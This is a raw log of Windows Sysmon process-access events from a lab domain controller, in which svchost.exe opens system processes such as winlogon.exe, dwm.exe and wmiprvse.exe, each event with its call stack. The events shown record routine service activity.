|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004039Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.847{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9400-00000000AE01}984C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004038Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.847{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9400-00000000AE01}984C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004037Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.754{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004036Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.754{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004035Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.754{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004034Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.754{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004033Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.754{266CAFBE-646C-6064-1000-00000000AE01}11242372C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9400-00000000AE01}984C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004032Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.754{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9400-00000000AE01}984C:\Windows\system32\dwm.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004031Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.738{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004030Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.738{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004029Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.738{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004028Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.738{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004027Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.738{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004026Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.738{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004025Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.723{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004024Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.723{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004023Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.723{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004022Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.723{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004021Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.723{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004020Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.723{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004019Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.723{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004018Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.723{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004017Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.723{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004016Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.707{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004015Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.707{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004014Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
